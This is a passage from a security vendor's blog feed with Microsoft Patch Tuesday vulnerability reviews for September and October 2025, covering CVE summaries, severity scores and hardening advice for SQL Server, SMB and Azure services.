undefined;'>CVE-2025-59289</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Bluetooth Service Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59195"><span style='font-size: undefined;'>CVE-2025-59195</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Graphics Component Denial of Service Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54957"><span style='font-size: undefined;'>CVE-2025-54957</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>MITRE CVE-2025-54957: Integer overflow in Dolby Digital Plus audio decoder</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-58731"><span style='font-size: undefined;'>CVE-2025-58731</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Inbox COM Objects (Global Memory) Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-58734"><span style='font-size: undefined;'>CVE-2025-58734</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Inbox COM Objects (Global Memory) Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-58738"><span style='font-size: undefined;'>CVE-2025-58738</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Inbox COM Objects (Global Memory) Remote Code Execution Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55681"><span style='font-size: undefined;'>CVE-2025-55681</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Desktop Windows Manager Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59257"><span style='font-size: undefined;'>CVE-2025-59257</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Local Session Manager (LSM) Denial of Service Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-48813"><span style='font-size: undefined;'>CVE-2025-48813</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Virtual Secure Mode Spoofing Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.3</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55334"><span style='font-size: undefined;'>CVE-2025-55334</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Kernel Security Feature Bypass Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.2</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55333"><span style='font-size: undefined;'>CVE-2025-55333</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows BitLocker Security Feature Bypass Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.1</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55338"><span style='font-size: undefined;'>CVE-2025-55338</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows BitLocker Security Feature Bypass Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.1</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55330"><span style='font-size: undefined;'>CVE-2025-55330</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows BitLocker Security Feature Bypass Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.1</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55332"><span style='font-size: undefined;'>CVE-2025-55332</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows BitLocker Security Feature Bypass Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.1</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55337"><span style='font-size: undefined;'>CVE-2025-55337</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows BitLocker Security Feature Bypass Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.1</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55682"><span style='font-size: undefined;'>CVE-2025-55682</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows BitLocker Security Feature Bypass Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.1</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55676"><span style='font-size: undefined;'>CVE-2025-55676</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows USB Video Class System Driver Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55325"><span style='font-size: undefined;'>CVE-2025-55325</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Storage Management Provider Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59203"><span style='font-size: undefined;'>CVE-2025-59203</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows State Repository API Server File Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59204"><span style='font-size: undefined;'>CVE-2025-59204</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Management Services Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59186"><span style='font-size: undefined;'>CVE-2025-59186</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Kernel Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55683"><span style='font-size: undefined;'>CVE-2025-55683</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Kernel Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55699"><span style='font-size: undefined;'>CVE-2025-55699</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Kernel Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59197"><span style='font-size: undefined;'>CVE-2025-59197</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows ETL Channel Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55336"><span style='font-size: undefined;'>CVE-2025-55336</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Cloud Files Mini Filter Driver Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59184"><span style='font-size: undefined;'>CVE-2025-59184</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Storage Spaces Direct Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59260"><span style='font-size: undefined;'>CVE-2025-59260</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Failover Cluster Virtual Driver Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-47979"><span style='font-size: undefined;'>CVE-2025-47979</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Failover Cluster Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-2884"><span style='font-size: undefined;'>CVE-2025-2884</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Cert CC: CVE-2025-2884 Out-of-Bounds read vulnerability in TCG TPM2.0 reference implementation</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Yes</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.3</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55679"><span style='font-size: undefined;'>CVE-2025-55679</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Kernel Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.1</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-58719"><span style='font-size: undefined;'>CVE-2025-58719</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Connected Devices Platform Service Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>4.7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59284"><span style='font-size: undefined;'>CVE-2025-59284</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows NTLM Spoofing Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>3.3</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-59294"><span style='font-size: undefined;'>CVE-2025-59294</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Taskbar Live Preview Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>2.1</span></p></td></tr></tbody></table><p></p><p></p><h2>Update history</h2><ul><li><strong>2025-10-20</strong>: added Summary Tables.</li></ul>]]></description>
      <link>https://www.rapid7.com/blog/post/em-patch-tuesday-october-2025</link>
      <guid isPermaLink="false">blt69dd6905757f06ea</guid>
      <category><![CDATA[Patch Tuesday]]></category>
      <category><![CDATA[Vulnerability Management]]></category><dc:creator><![CDATA[Adam Barnett]]></dc:creator>
      <pubDate>Tue, 14 Oct 2025 21:29:13 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt76ee31e15f145bd9/6849a5d2dc186db607081f3e/patch-tuesday-repeated.webp" medium="image" />
    </item>
    <item>
      <title><![CDATA[Patch Tuesday - September 2025]]></title>
      <description><![CDATA[<p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft is addressing 176 vulnerabilities today, which seems like a lot, and it is. Curiously, Microsoft’s own Security Update Guide (SUG) for </span><a href="https://msrc.microsoft.com/update-guide/releaseNote/2025-Sep" target="_self"><span style='font-size: undefined;'>September 2025 Patch Tuesday</span></a><span style='font-size: undefined;'> only lists 86 vulns, and that’s because the SUG doesn’t include a large number of open source software (OSS) fixes published today as part of updates for Azure Linux/CBL-Mariner. Microsoft is aware of public disclosure for just two of the vulnerabilities published today, and claims no evidence of in-the-wild exploitation. Yet again, there are zero-day vulnerabilities patched, but none of them evaluate as critical severity. Today’s release includes the publication of five critical remote code execution (RCE) vulnerabilities, although Microsoft expects that none of these are particularly likely to see exploitation. Five browser vulnerabilities have already been published separately this month, and are not included in the total.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>SQL Server: zero-day DoS</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>What happens if you ask SQL Server to deserialize a JSON object with thousands of levels of nested objects? If you guessed denial of service, then you are good at guessing, because that’s what </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-21907"><span style='font-size: undefined;'>CVE-2024-21907</span></a><span style='font-size: undefined;'> describes. As zero-day vulnerabilities go, it doesn’t seem particularly terrifying, since presumably the worst an attacker can do is knock down a service, which can then be picked up again. Of course, that’s all relative, since some SQL Server instances are doing very important work: think hospitals, airports, and other critical infrastructure. Taking a step back: if an unauthenticated attacker can send arbitrary queries directly into your SQL Server instances, then that’s already a broader security architecture issue.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Perhaps the most interesting thing about </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-21907"><span style='font-size: undefined;'>CVE-2024-21907</span></a><span style='font-size: undefined;'> is its long and convoluted history. The underlying defect is not in SQL Server, but in </span><a href="https://github.com/JamesNK/Newtonsoft.Json"><span style='font-size: undefined;'>Newtonsoft.Json</span></a><span style='font-size: undefined;'>, which is the de facto standard for handling JSON in .NET applications, including SQL Server and many other products. Versions of Newtonsoft.Json prior to 13.0.1 are vulnerable, and this isn’t new information; </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-21907"><span style='font-size: undefined;'>CVE-2024-21907</span></a><span style='font-size: undefined;'> was originally </span><a href="https://www.vulncheck.com/advisories/vc-advisory-ghsa-5crp-9r3c-p9vr"><span style='font-size: undefined;'>made public</span></a><span style='font-size: undefined;'> on 2024-01-03 with some help from VulnCheck, so Microsoft is playing catch-up here. The underlying defect has been public knowledge for way longer than that, however, since Aleph Security first flagged it up </span><a href="https://alephsecurity.com/vulns/aleph-2018004"><span style='font-size: undefined;'>way back in 2018</span></a><span style='font-size: undefined;'> without attaching a CVE number. It remains unclear why Microsoft chose to address this now, but better late than never.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>SMB server: zero-day(?) EoP</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>How’s your SMB server configuration? Is it fully hardened, with </span><a href="https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/overview-server-message-block-signing"><span style='font-size: undefined;'>SMB server signing</span></a><span style='font-size: undefined;'> and </span><a href="https://learn.microsoft.com/en-us/security-updates/securityadvisories/2009/973811"><span style='font-size: undefined;'>Extended Protection for Authentication</span></a><span style='font-size: undefined;'> enabled? If not, then </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-55234"><span style='font-size: undefined;'>CVE-2025-55234</span></a><span style='font-size: undefined;'> set out clearly why you should be worrying about SMB Server relay attacks, where an attacker pretends to be a legitimate server using ARP spoofing, DNS poisoning, or some other suitable trickery. Any pen testers or threat actors reading this will no doubt be thinking of the popular OSS tool Responder, which streamlines exactly this sort of attack. Options for attackers include credential relaying (which is mitigated by </span><a href="https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/overview-server-message-block-signing"><span style='font-size: undefined;'>SMB signing</span></a><span style='font-size: undefined;'>), as well as offline cracking of the hash to reveal the password.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The key takeaway from the </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-55234"><span style='font-size: undefined;'>CVE-2025-55234</span></a><span style='font-size: undefined;'> advisory, other than the explanation of the well-known attack surface around SMB authentication, is that this is one of those times where simply patching isn’t enough; in fact, the patches provide administrators with more auditing options to determine whether their SMB Server is interacting with clients that won’t support the recommended hardening options. Other Microsoft server products (e.g. </span><a href="https://learn.microsoft.com/en-us/exchange/plan-and-deploy/post-installation-tasks/security-best-practices/exchange-extended-protection"><span style='font-size: undefined;'>Exchange</span></a><span style='font-size: undefined;'>) offer a similar tough choice: lock out less capable clients, or leave your server in a state which permits relay attacks. None of the attack techniques covered are new, so this isn’t really a zero-day vulnerability, except inasmuch as it was published today, and describes an attack which is already publicly disclosed.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Azure Networking: critical EoP</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>It’s not every day that we see a perfect(?) 10.0 CVSS v3 base score, but </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-54914"><span style='font-size: undefined;'>CVE-2025-54914</span></a><span style='font-size: undefined;'> is one such rare beast, thanks to the seldom-seen scope change described by the CVSS v3 vector. However, that’s all we get; the aggressively minimalist advisory fails to explain the nature of the vulnerability in any way at all. Mercifully, the advisory does pour a little oil on its own troubled waters by clarifying that this is a cloud service vulnerability, Microsoft has already fixed it, and there is no action to be taken by users of the service. Other reasons to consider not panicking: the Acknowledgements section lists only Microsoft researchers, so we can hope that no one else knows enough to do any damage. For anyone wondering which cloud service was impacted, the answer is Azure Networking, which is probably only important if your cloud assets ever need to communicate with anything at all.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Azure HPC: critical RCE</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Azure High Performance Computer (HPC) admins should pay close attention to </span><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2025-55232"><span style='font-size: undefined;'>CVE-2025-55232</span></a><span style='font-size: undefined;'>, a critical unauthenticated RCE exploitable over the network. The advisory sets out the pre-requisites for the actual patch, and also hints that appropriate firewall rules should be in place, especially for TCP port 5999. The advisory doesn’t describe exactly what those firewall rules should look like or what they’re protecting, but port 5999 is the default port for the HpcScheduler, which orchestrates HPC jobs, resource management, and cluster communication.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Microsoft lifecycle update</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>There are no significant changes to Microsoft product lifecycles this month. A few Azure services move into retirement towards the end of September: Azure Basic Load Balancer, Azure Database for MariaDB, Azure HPC Cache, Azure Remote Rendering, Azure Service Map, Azure SQL Edge, Azure Unmanaged Disks, and Azure vFXT. As Rapid7 noted previously, there will be a number of significant changes in October, including the categorical </span><a href="https://support.microsoft.com/en-us/windows/windows-10-support-ends-on-october-14-2025-2ca8b313-1946-43d3-b55c-2b95b107f281"><span style='font-size: undefined;'>end of support for non-LTSC versions of Windows 10</span></a><span style='font-size: undefined;'>.</span></p><h2>Summary charts</h2><figure style="margin: 0; text-align: center"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt14558dece0027369/68c093a738cccc278aeaef8f/2025-09-vuln_count_component.png" height="520" alt="A bar chart showing vulnerability count by component for Microsoft Patch Tuesday 2025-Sep" caption="It is an ancient Mariner, and he patcheth one of three" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="A bar chart showing vulnerability count by component for Microsoft Patch Tuesday 2025-Sep" width="1071" style="text-align: center; width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt14558dece0027369/68c093a738cccc278aeaef8f/2025-09-vuln_count_component.png" data-sys-asset-uid="blt14558dece0027369" data-sys-asset-filename="2025-09-vuln_count_component.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="It is an ancient Mariner, and he patcheth one of three" data-sys-asset-alt="A bar chart showing vulnerability count by component for Microsoft Patch Tuesday 2025-Sep" data-sys-asset-position="center" sys-style-type="display"/><figcaption style="text-align:center">It is an ancient Mariner, and he patcheth one of three</figcaption></div></figure><h1>⠀</h1><figure style="margin: 0; text-align: center"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltde989965b5982236/68c093a7e2fb9a346a917fb4/2025-09-vuln_count_impact.png" height="453" alt="A bar chart showing vulnerability count by impact for Microsoft Patch Tuesday 2025-Sep" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="A bar chart showing vulnerability count by impact for Microsoft Patch Tuesday 2025-Sep" width="839" max-width="839" max-height="453" style="text-align: center; max-width: 839px; width: 839px; max-height: 453px; height: 453px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltde989965b5982236/68c093a7e2fb9a346a917fb4/2025-09-vuln_count_impact.png" data-sys-asset-uid="bltde989965b5982236" data-sys-asset-filename="2025-09-vuln_count_impact.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="A bar chart showing vulnerability count by impact for Microsoft Patch Tuesday 2025-Sep" data-sys-asset-position="center" sys-style-type="display"/></figure><h1>⠀</h1><figure style="margin: 0; text-align: center"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd1d3daa983de0a38/68c093a711efa9faf25ca2ea/2025-09-vuln_count_impact-component-heatmap.png" height="1300" alt="A heat map showing impact type by component for Microsoft Patch Tuesday 2025-Sep" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="A heat map showing impact type by component for Microsoft Patch Tuesday 2025-Sep" width="861" style="text-align: center; width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd1d3daa983de0a38/68c093a711efa9faf25ca2ea/2025-09-vuln_count_impact-component-heatmap.png" data-sys-asset-uid="bltd1d3daa983de0a38" data-sys-asset-filename="2025-09-vuln_count_impact-component-heatmap.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="A heat map showing impact type by component for Microsoft Patch Tuesday 2025-Sep" data-sys-asset-position="center" sys-style-type="display"/></figure><h2>Update history</h2><ul><li>2025-09-10: corrected link to Microsoft Security Update Guide and a small typo in a product name.</li></ul><h2>Summary tables</h2><p></p><h3>Apps vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55245">CVE-2025-55245</a></td><td><p>Xbox Gaming Services Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-55242">CVE-2025-55242</a></td><td><p>Xbox Certification Bug Copilot Djando Information Disclosure Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>6.5</p></td></tr></tbody></table><h3>Azure vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploited?</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSSv3 base score</p></th></tr></thead><tbody><tr><td><a href="https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2025-54914">CVE-2025-54914</a></td><td><p>Azure Networking Elevation of Privilege Vulnerability</p></td><td><p>No</p></td><td><p>No</p></td><td><p>10</p></td></tr><tr><td><a 